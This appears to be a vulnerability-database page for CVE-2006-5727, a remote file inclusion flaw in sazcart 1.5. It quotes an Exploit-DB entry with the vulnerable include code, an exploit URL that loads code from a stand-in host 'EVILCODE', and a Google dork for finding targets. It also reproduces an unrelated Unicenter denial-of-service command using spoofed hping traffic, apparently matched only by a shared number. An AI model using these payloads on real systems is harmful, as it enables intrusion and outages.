CVE-2006-5727
published 2006-11-06CVE-2006-5727: PHP remote file inclusion vulnerability in admin/controls/cart.php in sazcart 1.5 allows remote attackers to execute arbitrary PHP code via the (1)…
PriorityP337medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
3.32%
87.1th percentile
PHP remote file inclusion vulnerability in admin/controls/cart.php in sazcart 1.5 allows remote attackers to execute arbitrary PHP code via the (1) _saz[settings][shippingfolder] and (2) _saz[settings][taxfolder] parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sazcart | sazcart | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SazCart 1.5 - 'cart.php' Remote File Inclusion
exploitdb·2006-11-04
CVE-2006-5727 SazCart 1.5 - 'cart.php' Remote File Inclusion
SazCart 1.5 - 'cart.php' Remote File Inclusion
---
sazcart v1.5 (cart.php) Remote File include
*********************---Hitamputih crew---********************************
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
*Risk : High
* Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
*especially thx to [email protected]
bug found on admin/controls/cart.php
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;
exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?
google dork: "powered by sazcart"
# milw0rm.co
Exploit-DB
Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service
exploitdb·2006-01-17
CVE-2006-0306 Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service
Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service
---
source: https://www.securityfocus.com/bid/16276/info
Computer Associates Unicenter Remote Control DM Primer is prone to a denial-of-service vulnerability.
Attackers may trigger a denial of service due to a hang. Note that an attacker may easily source IP addresses because the service uses UDP.
Proof of concept:
hping -2 -s 1025 -p 5727 -d 4097 -a 1.1.1.1
No writeups or analysis indexed.
http://secunia.com/advisories/22708http://www.attrition.org/pipermail/vim/2007-January/001232.htmlhttp://www.osvdb.org/30194http://www.securityfocus.com/archive/1/456542/100/0/threadedhttp://www.securityfocus.com/bid/20922http://www.vupen.com/english/advisories/2006/4343https://exchange.xforce.ibmcloud.com/vulnerabilities/30013https://www.exploit-db.com/exploits/2718http://secunia.com/advisories/22708http://www.attrition.org/pipermail/vim/2007-January/001232.htmlhttp://www.osvdb.org/30194http://www.securityfocus.com/archive/1/456542/100/0/threadedhttp://www.securityfocus.com/bid/20922http://www.vupen.com/english/advisories/2006/4343https://exchange.xforce.ibmcloud.com/vulnerabilities/30013https://www.exploit-db.com/exploits/2718
2006-11-06
Published